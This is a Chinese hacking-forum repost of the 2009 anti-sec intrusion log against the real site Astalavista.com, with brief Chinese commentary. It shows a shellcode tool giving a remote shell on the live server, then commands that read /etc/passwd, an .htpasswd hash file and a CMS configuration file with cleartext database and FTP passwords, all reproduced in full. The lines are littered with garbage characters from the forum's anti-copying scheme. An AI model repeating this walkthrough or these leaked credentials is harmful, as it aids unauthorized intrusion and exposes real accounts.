中国网络渗透测试联盟

标题: Astalavista被蹂躏过程 [打印本页]
作者: admin    时间: 2012-11-6 21:07
标题: Astalavista被蹂躏过程
里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。) q( y* h% |. U: }3 s
; Q7 j/ c0 }8 M' s2 E
[root@front3 ~]# curl -I litespeedtech.com
$ [2 g: y# s' L$ w5 N4 uHTTP/1.1 200 OK# v1 l7 W. v% M, c7 H) z+ |6 n
Date: Fri, 05 Jun 2009 22:54:51 GMT) ?1 C& u6 g) z% \; A- v2 H
Server: LiteSpeed3 J, |/ [6 d$ [- i& o- x. q

9 N4 [9 K) b) f( e: p; C另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3  x64还有一个localroot 0day -_-
1 h! U* G/ t7 N' F5 f( k9 A1 O1 |4 K; r/ {
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
' S1 U$ N0 c2 F& r) b! G
4 J( U# w& r" E/ s
  {* n; m; f* ^, }2 ?/  _  \  /   _____/\__    ___/  _  \ |    |     /  _  \   \ /   /|   |/   _____/\__    ___/  _  \ 9 c- N# h" v- Y2 ?
/  /_\  \ \_____  \   |    | /  /_\  \|    |    /  /_\  \   Y   / |   |\_____  \   |    | /  /_\  \0 w  \4 P  v! a' M) j
/    |    \/        \  |    |/    |    \    |___/    |    \     /  |   |/        \  |    |/    |    \+ M5 z" X/ o! A5 A& g* {
\____|__  /_______  /  |____|\____|__  /_______ \____|__  /\___/   |___/_______  /  |____|\____|__  /+ A5 u" l9 X" d. l! q& G
        \/        \/                 \/        \/       \/                     \/                 \/
2 n" [# d0 j; v  ~  a6 p, y. ^                                  The Hacking & Security Community: H7 Y9 f2 U$ s. k# n' |+ V7 G
[+] Founded in 1997 by a hacker computer enthusiast3 L+ n6 F) H! I, k* E- B
[-] Exposed in 2009 by anti-sec group
% v7 J9 a& }: }4 ~+ T8 n" ?0 V' s- h( e8 h
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
* t" X0 I  {6 g3 ~- I- b* ]>> 03. Who’s behind the site?
2 K+ F/ ^0 V$ d8 k>>
) ~) e  |9 R1 ]# e>> A team of security and IT professionals, and a countless number of contributors from all over the world.- ?; B& K: m" g: a) s* _/ E) S6 U

1 L3 m, l& z8 |* O5 [$ r>> 05. Is it true that the site is visited by script-kiddies and warez fans only?* t' z7 r& ?2 X
>>
4 ]4 G$ t- \$ w8 x6 R>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
7 J1 H/ x3 ^( cmilitary institutions." _- F& W; L+ h/ r) \
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information., e  N0 u: l& u: F% @$ O

2 O* E" |( |2 o4 BWhy has Astalavista been targeted?& V$ A) U% z+ C7 X, a3 p
) s' m* T$ i  B% T
Other than the fact that they are not doing any of this for the “community” but
2 }$ X0 u( ~5 cfor the money, they spread exploits for kids, claim to be a security community- L4 X4 T8 p$ f+ W) P
(with no real sense of security on their own servers), and they charge you $6.66
' ?' n/ q) y" j: [0 H: m( s$ X7 Mper months to access a dead forum with a directory filled with public releases: R9 z: Z6 q! z: H* A6 v
and outdated / broken services.
+ p( ]" A2 A) C6 I: Y% S3 X# l& j# A, q; @2 T5 s' u4 t* d  W
We wanted to see how good that “team of security and IT professionals” really is.; a& y: i  O" p, a( u

) d& f: [, F/ N! W/ q! W2 LLet’s begin.
! [! R; V* [& J- ?5 }+ X
! g( a) i: }% e$ L3 r4 O+ k+ aanti-sec:~# ./g0tshell astalavista.com -p 80# _5 m8 \6 @: b! D+ S1 y
[+] Connecting to astalavista.com:80
6 y& D; Y: \, m6 z[+] Grabbing banner…( p- \8 F3 F" I2 v) u* O# {5 X7 ?! s
LiteSpeed; f& A* b, I7 e! X' \2 A" _, m- Q
[+] Injecting shellcode…
/ r8 J) F: A8 c5 ?% p, d* e: ~[-] Wait for it# m7 i: l& Z# i0 X4 j: L1 D+ |% p
" I  s* y3 X0 E4 ~4 R' {; `& a3 `
[~] We g0tshell8 H* k: A; D/ s% x
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux8 T* u0 W# W( d4 [$ F2 m, t5 c8 K
ID: uid=100(apache) gid=500(apache) groups=500(apache)5 ~( e/ E% v6 E9 M

# e% j) S2 l8 h! @9 @0 J$ E% Nsh-3.2$ cat /etc/passwd8 J' `. t0 a; x& H0 b3 i: q
root:x:0:0:root:/root:/bin/bash3 ]1 Y9 J: h$ e' H
bin:x:1:1:bin:/bin:/sbin/nologin1 M: t4 r$ H/ H9 @2 r! V4 p9 O
daemon:x:2:2:daemon:/sbin:/sbin/nologin8 k6 h' o; F# {& S2 f
adm:x:3:4:adm:/var/adm:/sbin/nologin& D& \# l  S# k7 ?. J' A
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin0 v  L6 m3 P( K$ {7 T5 k
sync:x:5:0:sync:/sbin:/bin/sync
* n1 |2 g* _/ P  Rshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown7 C4 ^" T" L2 H' H1 J5 C# T1 f+ U
halt:x:7:0:halt:/sbin:/sbin/halt
: m  }; U' o* `6 F/ Z( o2 @mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
9 _( T6 m0 W  D6 U8 Anews:x:9:13:news:/etc/news:- N) l1 ~9 T( V3 @
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin$ {9 N$ N5 d; s$ f' W9 H$ o) v
operator:x:11:0perator:/root:/sbin/nologin
) ^6 Q' J# U- I6 |) M% e9 m( J0 Qgames:x:12:100:games:/usr/games:/sbin/nologin5 b8 L* N1 V6 I  k3 O
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin( s# `1 x$ f8 J( |- j: P3 X, |6 p/ Y* o
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
. d5 f1 E2 T6 o) Dnobody:x:99:99:Nobody:/:/sbin/nologin
- O. r3 J& u" Z9 L% o+ Y$ Xrpm:x:37:37::/var/lib/rpm:/sbin/nologin" F8 }) p+ M9 }
dbus:x:81:81:System message bus:/:/sbin/nologin- M- J, D, T" [8 b; N
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin8 o' w9 b  i0 I7 e5 h" g
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin0 P0 I3 K7 _$ o
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
! u9 @# X) ?; Tvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin; X# D1 K9 x- H1 C- b7 g( e
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin% s, [6 f, w5 ^8 {2 ?* {* ?
rpc:x:32:32ortmapper RPC user:/:/sbin/nologin' K1 J) D% j; f/ w& N3 R0 |" W, _
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin$ J/ R6 O+ {: m6 Z
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin6 q( X, ^. h  x; M6 o6 t* e6 H
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin- m( m. a' {/ Y
pcap:x:77:77::/var/arpwatch:/sbin/nologin
' g& E" m2 S( D3 ~! enamed:x:25:25:Named:/var/named:/sbin/nologin
3 w/ j' l& e  _- gapache:x:100:500::/var/www:/bin/false9 P/ V, D- s% P
diradmin:x:101:101::/usr/local/directadmin:/bin/bash* E$ Z4 r. T6 ?. k# h; s! |' B
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
7 _- ^* c  I, o' A4 N$ R2 Vwebapps:x:500:501::/var/www/html:/bin/bash: S5 @& A/ {. @1 W4 \- f5 j* d
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash3 b8 J1 B% n% ~& y" V
admin:x:501:502::/home/admin:/bin/bash
! ?& m+ _* T: K; d$ I/ hjon:x:502:503::/home/jon:/bin/bash
( k0 C6 |. r, G; J( U2 Kcom:x:503:504::/home/com:/bin/bash1 o) N- W9 K% Z! n1 V. v" g" R# l
ntp:x:38:38::/etc/ntp:/sbin/nologin
8 C# g+ t# h: q+ U' B8 m+ g2 Rais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin* T9 `$ t" Z/ |# U7 q
astanet:x:504:505::/home/astanet:/bin/bash
1 u  n5 R# b' A  J  Q  Z( davahi:x:70:70:Avahi daemon:/:/sbin/nologin
' h; O7 ~) P% j$ |2 g  k- ?6 e1 v6 E+ uavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
# W5 B+ u. S- G2 S& w9 \
! t- k* \- I9 \7 k) R9 W" {& rsh-3.2$ cat /etc/hosts) ^% E, o. k4 N+ c9 {
# Do not remove the following line, or various programs" F" Y2 d3 h. J9 h& q" a7 U8 J
# that require network functionality will fail.
5 i5 W3 b( k7 ~- b1 t% g* ^% [127.0.0.1       localhost.localdomain   localhost
6 r6 Z1 @) W, |! @9 j::1     localhost6.localdomain6 localhost62 m4 b, `: {; Q# K
80.74.154.172           asta1.astalavistaserver.com
- Y. @5 l/ [  n( e4 g8 u$ e( m4 @- ]1 b
sh-3.2$ pwd# [6 g! c8 }* ]5 A/ R4 g8 B$ H
/home/com/public_html' K6 ^" y3 p# \4 g0 f* @
* c4 q0 p* k$ T& U
sh-3.2$ ls -la
- i9 Q& s1 R; {3 A3 ctotal 18460/ q/ }; ^6 R) z! g# h) Q3 s" L
drwxr-xr-x 30 com apache     4096 May 28 17:06 .( `& \2 W" j: H$ {: ]( V
drwx–x–x 11 com com        4096 Jun 25  2008 .., X( H6 n! ~' Q% Q, g6 L0 v
drwxr-xr-x  2 com com        4096 Feb  2 19:29 admin
2 A( _$ l+ d5 U1 T! S9 gdrwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache
; `+ w. Y: Y' x6 y( h6 n3 cdrwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin
) {% b4 Q6 y+ b7 M' i' [" wdrwxrwxrwx  2 com com        4096 May 19 00:50 config# g( X6 n9 @; F7 c' q
drwxr-xr-x  2 com com        4096 Mar 20 11:05 core. c/ g9 r) c5 W" n; Y0 S# l- {0 H5 }
drwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules- X8 E+ @  ~* f" `0 L& q0 S
drwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing
. v+ d( o2 T9 k0 e* W; Rdrwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo: ]2 b; ?3 M8 I2 u3 a
drwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__
: m7 M2 c- K; S-rw-r–r–  1 com com        8035 May 19 14:26 directory_to_mediadir.php7 f' M2 n1 j: a. B7 t5 r0 ^2 d- V
drwxr-xr-x  2 com com        4096 Sep  9  2008 dvd
# \' R  d( s! P: a( ~+ u% F* Mdrwxr-xr-x  3 com com        4096 Feb  2 19:29 editor
- _  }, q$ r' o2 t-rw-r–r–  1 com com        3750 Feb 27 16:12 favicon.ico4 a; `; c8 H5 ?4 w. z5 T/ s8 w8 W
drwxrwxrwx  2 com com        4096 Jun  4 08:00 feed/ M) v, H& h4 f
-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess* L) S1 i4 i; l( {; c5 V  N
-rw-r–r–  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak
! l0 P1 w' j) D$ g-rw-r–r–  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak0 }: m& x1 ?- V7 I9 f+ X# l$ R' z
drwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool
( E3 w" s- O) F: @  adrwxrwxrwx 14 com com        4096 Feb  2 19:29 images! ^) |) d' G  d. N  \9 H. m
-rw-r–r–  1 com com       97496 Jun  2 13:01 index.php  q! l* i# i6 g; `; E, u: @
drwxr-xr-x  6 com com        4096 Feb  2 19:29 installer
# @( N/ Z: B9 h1 u& m1 Vdrwxr-xr-x  8 com com        4096 Feb  2 19:29 lang7 {7 R5 D5 m6 ?
drwxr-xr-x 22 com com        4096 Feb  2 19:29 lib) o$ F2 t, U# ~2 m% @2 H
drwxrwxrwx 12 com com        4096 Jun  2 07:47 media
# s+ @& S& C# K$ G! V5 m. d: fdrwxr-xr-x  8 com com        4096 May 11 12:48 modifications
0 s) A$ U0 J& u! D+ K+ E3 x1 H8 Ddrwxr-xr-x 34 com com        4096 May 28 16:30 modules4 t9 c. D: V4 n  a/ v5 D1 W
drwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin* I: _: J8 T! Z* a3 Q, H, C
drwxrwxr-x 22 com com        4096 May 28 17:06 _new
, F2 O" j' g0 s! U2 i3 Kdrwxr-xr-x 26 com com        4096 Feb  2 19:27 _old
& V; |9 B( C. F+ O8 Hdrwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy; e2 J  b: V) W+ f* L3 P" I' M
drwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy0 C9 K" u# n2 R  t# c$ `8 C# D
-rw-r–r–  1 com com          26 Feb  2 19:33 robots.txt/ N3 ~6 c6 S) P6 {7 D
-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml
9 x0 @4 \. x3 E* g-rw-r–r–  1 com com         223 Mar 30 15:32 test.php
% p% U; ~8 _% B$ e: c* M1 \drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes% c9 r- l0 G; z+ W# y
drwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp% x- k: |, }; v  k6 ?" j
drwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam9 g' }1 r0 a- d4 a
; @) I3 o6 }& l  T
sh-3.2$ head -20 index.php, `. f% }- W: Z) l# v1 @3 e
<?php
! a+ j" V% D( z
$ B% K$ a* E# A/**
; l* n+ o" ?1 n( c* The main page for the CMS
1 Z  E6 w: g" d/ e* @copyright   CONTREXX CMS - COMVATION AG4 Z5 C. v, s0 B* J: c, Z
* @author      Comvation Development Team
& t$ d5 k$ ~1 N  {9 Q2 l/ |* @version     v1.0.9.10.1 stable1 w0 W1 D; G' R
* @package        contrexx
% W& g  S/ p' x" u; `* @subpackage    core
* S, Q. E+ f3 q$ x8 K; s" ^1 S* @link        链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
5 b4 j0 j1 P$ Q, F0 M* @since       v0.0.0.03 V; B! j  G! c
* @todo        Capitalize all class names in project
5 Z$ \: a8 V, Q* @uses        /config/configuration.php* O: t$ J' _( c% ^% I: E
* @uses        /config/settings.php
. W+ A0 ?9 p, u6 }* @uses        /config/version.php- Z0 x% K" H9 n* u
* @uses        /core/API.php0 {+ u& f5 y: `. v# n0 ~" U2 Y
* @uses        /core_modules/cache/index.class.php
8 [2 E" e6 F# w( Z* @uses        /core/error.class.php) `; h* [8 \- g# S9 M( Q" a
* @uses        /core_modules/banner/index.class.php
0 l  x' Y* a& x/ M2 h* O3 v! i* @uses        /core_modules/contact/index.class.php
. ~/ R% M. ^: H+ W, y
, V% \4 @1 R1 ish-3.2$ cd config/( V7 A% p2 i3 I6 @
sh-3.2$ ls -la" P& t5 b1 [4 a+ ^
total 32
7 T; I5 X; ]+ q3 Q- Cdrwxrwxrwx  2 com com    4096 May 19 00:50 .( T) ]6 r* n+ j: Q& F
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
' x# Q% P% I1 h& ]-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php& ]/ W: Z( Z, p% p0 c8 ^
-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php4 {% C' ]0 K9 ]6 ~: }
-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php- I5 x& S; T8 z$ {
-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php
; O: R8 s" P$ L7 B1 |
' F8 C; S+ q+ d3 B6 `( [# ish-3.2$ cat configuration.php
- R: i0 U' w& [3 ~4 D+ V: F5 @, U[snip]7 q% U8 [; |) Y) ?5 U* B5 Z5 }: M
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
$ k/ W; q! G0 I: V& O) Y- q: `0 Y$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name  V' S9 g6 X- {+ N( e2 d
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix8 k; V8 G& X* h; P
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username; c9 t! d3 J& F
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
! s0 }$ m2 o, Y$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)& e5 R* J+ ]3 T& \( p
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
% T' n! A5 C2 L" j[snip]
. C7 p2 N1 R0 V$_FTPCONFIG['is_activated'] = true; // Ftp support true or false( ^* ~0 ^# |) m. ~6 J5 s
$_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode4 y6 ]: }) ]4 M
$_FTPCONFIG['host']     = ‘localhost’;// This is normally set to localhost
$ C8 a5 S9 B4 L$_FTPCONFIG['port'] = 21; // Ftp remote port
! P) ]$ |4 Y0 L8 w; Y7 Q9 e' O* ]$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
) f7 Y' N2 ^- w5 v8 ~# ?3 h$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password+ G8 t2 u' o3 H
$_FTPCONFIG['path']     = ‘/’; // Ftp path to cms
& ^$ \! O3 ]; \, U9 m. s7 n5 P9 g0 R: ~
sh-3.2$ cd ..
4 c; P1 I! ^4 n7 z' b* @sh-3.2$ cd dvd/) C# C; w  p4 K( K" O  t
sh-3.2$ ls -la( k" [0 j! }# E
total 2913780
+ ]+ h- \0 H7 m' P4 D; ydrwxr-xr-x  2 com com          4096 Sep  9  2008 .: o+ z! I; ]5 `) C' ^/ I
drwxr-xr-x 30 com apache       4096 May 28 17:06 ..6 i* g4 O5 l- F( c+ ?; i% }
-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part1.rar
) w- ~0 Z, \! O-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part2.rar
+ R- E( v! M( `1 R9 f3 Z-rw-r–r–  1 com com     880644069 May 16  2008 astalavista_security_toolbox_dvd_2008.part3.rar
% q) r& ]/ c4 J- v/ q/ x-rw-r–r–  1 com com           115 Jan 29  2008 .htaccess
/ d5 I- I: n" j4 {  f
2 v: Y- W1 ]- p6 h) Q0 e, z( }sh-3.2$ cat .htaccess; s4 s/ T% d. t& p) ]* |) d
authType Basic) Z& D( \. J8 X; I
authName DVD% @5 N: N% E$ K7 b; w) O
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
! w6 e+ I. z$ x3 q- qrequire valid-user" M  j/ m( m- f6 T' t( B+ Z* W1 R9 U

) i! G4 O; ~. C7 Y, csh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
* ]+ o5 D$ c; @DVDdownload:CRD8cuY6.MPT6
' e( S5 n- L+ d5 y. c' K: x1 ^DVDdownload2:CR8a36.wluFMg
) k# C- k3 s- ^5 z2 b. f/ X
5 l% |' j$ _3 l$ c1 N( Ksh-3.2$ cat test.php
6 h6 S5 U+ `( s<?php+ _- {3 H$ p5 v, J* S
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
1 \# W, `5 G' U$url = str_replace(array(’&amp;’, ‘&#38;’), ‘&’, base64_decode(rawurldecode($url)));$ l" c1 w2 `6 x% R' Z" _$ w
echo $url;4 U; i, A' h0 ?/ D
?>
4 ~" h, K/ k& }( m# K0 f
6 w5 J+ H" {& q  H+ }sh-3.2$ cd modifications/+ t* y0 ~+ w/ }( L0 H
sh-3.2$ ls -la
: B7 y5 P4 b& B2 ctotal 32  Y& b6 R. q: L5 ^6 W
drwxr-xr-x  8 com com    4096 May 11 12:48 .3 I/ p6 |9 x+ n+ k9 G  y9 [0 K
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
% T2 y4 }; C, K1 j7 f. Q& Y: T) _drwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng
1 L/ q' b2 F6 y: q# bdrwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs
. w# s% E# t$ }  s5 sdrwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools! Y8 p+ I  U9 s, m
drwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc
: B- R: S- @1 T5 t$ N' t4 vdrwxr-xr-x  2 com com    4096 Feb  2 19:33 search- }" b: j8 u) Q) J9 U
drwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp
! ?$ ^& m, m6 F3 b( o6 p, T
% c- d- L. Z8 m- ash-3.2$ ls -R  {) @/ G) B! u/ u* z) F/ L
.:
5 H6 d6 b1 w/ L5 B7 y% |com_avtng  cronjobs  onlinetools  pjirc  search  _tmp# o# b3 h4 l3 @+ J2 x/ L$ A3 ^
" W2 K6 N/ K3 h3 Z3 w, i
./com_avtng:
% j: p9 `9 c1 P/ k+ Navtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts
4 K# a5 a+ k' k1 G  |# W
2 l6 i) [: Q" _./com_avtng/scripts:
; f% D6 b9 c0 V" Hpopunder.js% _+ h+ ?6 t0 T. D9 f( `
& R3 U. J, R' [2 Q4 o
./cronjobs:, u: C: h5 N. j1 Y, u
exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp9 r) ?0 X0 e9 |( o# Z( e
5 V! C( _2 c' B: }: m: B, ]
./cronjobs/tmp:
! {! i4 Z8 }7 |/ wcontrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv5 R  l; S8 \9 I4 f5 Y
( K/ m. c$ m, o# I3 E+ v2 _* t
./onlinetools:
6 h  U( y! G& Y: Q$ yindex.php
. j* v2 F2 }- a: v% L8 M0 ^/ r5 a: I2 O0 y% \2 h
./pjirc:
( |; Z$ k; G1 W: s) M+ ]4 Va_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt
0 C/ `/ |1 o1 L8 u0 j& G3 }AppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt
+ g; ]8 g% v: U+ ^background.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd
; u, M- M* i  P6 `/ I' g
( y& p* v, J) e' M; C./pjirc/img:
0 n' x2 F* i* }  i' N  W4 t' j( Tange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif
, H' l, g: O2 e$ Y; c/ D, I" rarbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif   
. B2 Z, D% k9 [6 R& |4 V* G) j3 Iverre-eau.gif
& K! w7 v& L+ k+ `% {" `; margh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif  
+ }6 L. ]9 ~7 iverre-vin.gif
! T9 @' w* A) I& w1 S: Eballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif# a* ^6 y/ c( U. N6 H; h' ]) V  B
biere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif; y$ m9 H# ]" @3 k9 h

. o9 `/ z- V  P/ {./pjirc/snd:9 P5 |% S, ~4 f( r
bell2.au  ding.au# [) \7 l; k4 M. F- `/ y  N$ ?! j

+ ?, D; s; U  d) P# r./search:
( a( c$ B3 T+ A" Z8 ]& osearchEngines.php  search.php0 v+ S" @) O" A  ?

9 i; |; ~3 K; t$ g' Z./_tmp:
8 N2 t% u* Y5 O1 Z8 MdefaultPorts.php  defaultPorts.txt
) s, K2 b6 o9 ?$ V; j( {- [1 m( H2 k& d" x* ^
sh-3.2$ cd cronjobs// _2 }9 G- N. E/ [% w* W2 g9 l
sh-3.2$ cat exploits.php
- L0 e; R9 I' b( p; d0 z( t, P[snip]; z, w$ O) [3 J4 i7 g4 [
$categories   = array();
+ l- L" D$ ^9 W4 A# _! T4 e4 _$milw0rmFile  = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;- T& F; c6 R: X/ J! a( F
$expolits     = file($milw0rmFile);  Y# F* I& s9 ~8 I8 U7 p
$comExploits  = array();
' ~7 g& i# s# |/ h; T[snip]0 Q2 E2 d3 B& b, Y' F
// manage data
5 S% j9 L# s1 f4 `& X2 z1 Lfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
8 x2 B3 z4 ?: I+ C4 p7 P) `* a& ?3 U) V; Z
    // get path and title
8 i. T7 h9 N: h$ A    $expolits[$x] = trim($expolits[$x]);: d3 R" u7 F0 J. A; B7 j
    $path         = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));% P. H9 d! x7 e* s
    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
( Y6 T) c5 i8 w# T4 P6 |; y  o4 P5 Q9 N2 }
    // check if file exists
* ?" S6 w) g, p. V" r' m    if (file_exists($path)) {: s+ n2 n. ^+ u7 l$ s

) B0 j5 v4 m$ S, E) }6 S        $text = file_get_contents($path);
/ [2 s, q; r- F; \/ U
2 J+ ], y/ D$ Q3 u. C0 \        // get content and date
$ z- Y- Y6 y" a  ~4 L        //$text = htmlspecialchars($text, ENT_QUOTES);
, y% f% A9 N# D! b        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, “UTF-8″));- d# ?0 c2 U2 h- F" M; C& [" v
        if ($tmptext != ”) {
. {3 z. o6 |$ k/ D+ H            $text = $tmptext;
; l# q1 m  v$ Y9 [+ O  R        } else {
& \$ z& ]% k* R1 A            $text = addslashes(htmlentities($text,  ENT_QUOTES));; M4 k( y: w4 l% c
        }6 M8 J* r- g5 b# ]! h; ?2 V
        $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
, m0 G1 x& Y6 z        $tmp  = explode('-', $date);
! S( z. ]* o4 Q* y7 E        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
% o# @, a( [$ F! ~& v2 o        $cat  = getCategory ($path);- p( K4 T2 D% N$ A+ A  e
        $ext  = pathinfo(basename($path));7 {7 O" }  l8 Q
        $ext  = $ext['extension'];
$ e$ l: H5 {8 W6 [        $qStr = ”
$ e3 S5 W) p* U            SELECT  `id`7 J+ J# Q$ M4 M8 T% D7 y
            FROM    `contrexx_module_exploits`6 E& g2 W  z5 K, c* {" t, ~
            WHERE   `title`  =  ‘” . $title . “‘8 w) G# {& j7 U" ~' y' M, @1 q
            AND     `date`   =  ‘” . $date . “‘3 r  y4 o/ x% V; R4 w
        “;7 d  A# l, Y3 u7 {1 a% ]6 y% L: s
        echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
. _' S" a  e0 e7 ^' n9 J        $q = $_objDB->query($qStr);
$ U+ k6 E! Q& h& |$ {1 ^/ Q4 q  N/ M, `) \; V" w- i' J
        if ($q->numRows() == 0) {3 X$ e9 I( u6 p9 F; ]2 u+ a

% \1 y! _; j) _/ m7 W            // prepare array
! N( ^( A' T# \            $comExploits[$x]['date']      = $date;( [. R' `$ k: u+ p
            $comExploits[$x]['title']     = $title;$ R% A  T9 z2 d; k# P/ L
            $comExploits[$x]['author']    = ‘milw0rm’;
7 z+ q8 u, }( N5 J            $comExploits[$x]['text']      = $text;
9 F1 k8 J3 j  Y            $comExploits[$x]['source']    = $ext;
: [9 G6 n6 O' ^2 k            $comExploits[$x]['url1']      = ”;
  T( L# P; S+ _( z            $comExploits[$x]['url2']      = ”;
- M# O" t4 [7 Q( f2 }7 U            $comExploits[$x]['catid']     = $cat;3 n7 G* [- t; A5 B2 W# q+ M2 c! M$ O
            $comExploits[$x]['lang']      = ‘2′;: N+ u* v+ v. R
            $comExploits[$x]['userid']    = ‘12′;
% b9 H3 H( }0 L2 |! F            $comExploits[$x]['startdate'] = ‘0000-00-00′;
( h: S3 \" a1 |5 q" [            $comExploits[$x]['enddate']   = ‘0000-00-00′;
5 N+ ^- z# u/ T            $comExploits[$x]['status']    = ‘1′;. ?3 k1 ~+ j6 N! `/ c( L
